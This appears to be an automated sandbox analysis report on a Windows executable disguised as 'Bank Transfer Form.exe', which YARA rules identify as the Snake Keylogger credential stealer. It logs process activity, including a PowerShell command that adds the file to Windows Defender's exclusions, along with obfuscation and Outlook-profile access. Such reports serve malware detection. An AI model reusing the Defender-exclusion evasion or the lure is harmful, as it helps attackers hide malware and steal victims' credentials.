                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, WPHP2SbJjmZSALkB5D.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, WPHP2SbJjmZSALkB5D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, WPHP2SbJjmZSALkB5D.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, WPHP2SbJjmZSALkB5D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, WPHP2SbJjmZSALkB5D.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, WPHP2SbJjmZSALkB5D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@3/3
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Bank Transfer Form.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ageywabl.414.ps1Jump to behavior
                Source: Bank Transfer Form.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Bank Transfer Form.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Bank Transfer Form.exeReversingLabs: Detection: 36%
                Source: Bank Transfer Form.exeVirustotal: Detection: 40%
                Source: unknownProcess created: C:\Users\user\Desktop\Bank Transfer Form.exe "C:\Users\user\Desktop\Bank Transfer Form.exe"
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess created: C:\Users\user\Desktop\Bank Transfer Form.exe "C:\Users\user\Desktop\Bank Transfer Form.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess created: C:\Users\user\Desktop\Bank Transfer Form.exe "C:\Users\user\Desktop\Bank Transfer Form.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Bank Transfer Form.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Bank Transfer Form.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: Bank Transfer Form.exeStatic file information: File size 1084416 > 1048576
                Source: Bank Transfer Form.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x108000
                Source: Bank Transfer Form.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Bank Transfer Form.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: BxFK.pdbSHA256D source: Bank Transfer Form.exe
                Source: Binary string: BxFK.pdb source: Bank Transfer Form.exe

                Data Obfuscation

                barindex
                Source: Bank Transfer Form.exe, Form4.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.cs.Net Code: EU1NM8oWuU System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.cs.Net Code: EU1NM8oWuU System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.cs.Net Code: EU1NM8oWuU System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Bank Transfer Form.exe.3e373f0.2.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Bank Transfer Form.exe.7200000.5.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: Bank Transfer Form.exeStatic PE information: 0xEA9A69F2 [Wed Sep 22 10:03:30 2094 UTC]
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0F274757 push FFFFFF8Bh; iretd 0_2_0F274767
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 0_2_0F271D6B push eax; retf 0_2_0F271D71
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_01809C30 push esp; retf 0182h3_2_01809D55
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F39241 push es; ret 3_2_06F39244
                Source: Bank Transfer Form.exeStatic PE information: section name: .text entropy: 6.860597540741749
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, YRJCD4GuTkTB5AFtUh.csHigh entropy of concatenated method names: 'sUteCUKxOF', 'aHYeYIgr7H', 'y6lefvIT1U', 'KWDe2CZ228', 'PZZewcLtKa', 'hnreqRgKGG', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, FyOPAW54oZ0b7HNW4y.csHigh entropy of concatenated method names: 'Dispose', 'U409luscwt', 'rYJkBqMk8m', 'a8al88GfCG', 'hFX9Gb9sHS', 'vgF9zP5qcW', 'ProcessDialogKey', 'iyok7A8ZRt', 'DQ2k9cNhrw', 'gCZkkGRJCD'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, WPHP2SbJjmZSALkB5D.csHigh entropy of concatenated method names: 'g0F5EsE8Ix', 'c0K5IoGB8X', 'yRK5tT8JaV', 'Cw95Lv2Rf2', 'n4m58kF2vq', 'uZq5HLNdOo', 'vqB5Vrf27o', 'jSk5WIHugE', 'EOl5lAFs5c', 'W265Gk4CB3'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, OrbTnwVH9840uscwtY.csHigh entropy of concatenated method names: 'IIqwU77tpg', 'KqtwaCr0VR', 'ti1wwI3P2W', 'khywdw3Duf', 'mqJw3llEb7', 'Cwow4GQXaq', 'Dispose', 'VZWAhW8Bb3', 'XtAA5gBYG4', 'HIjACjTA6V'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, DIv3B497lwTEGfxJNnW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LdgeoQj9PL', 'Qy8e00HZYo', 'pm3epIkOxU', 'yDIeEhSxhi', 'nBdeILVKnn', 'Vc0etMi0rp', 'MZTeLgZqkr'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, GK3rb8Xx6FpRmLh2PZ.csHigh entropy of concatenated method names: 'E8426mT4SH', 'QsQ2SW2wxt', 'UnO2M8H4pW', 'DUp2DdRPyM', 'qEk2vUkFBu', 'gOs2x9bYXE', 'rR22mCUorV', 'JQ02bhcOYC', 'Mft2iulPXg', 'O5D21vpN1J'
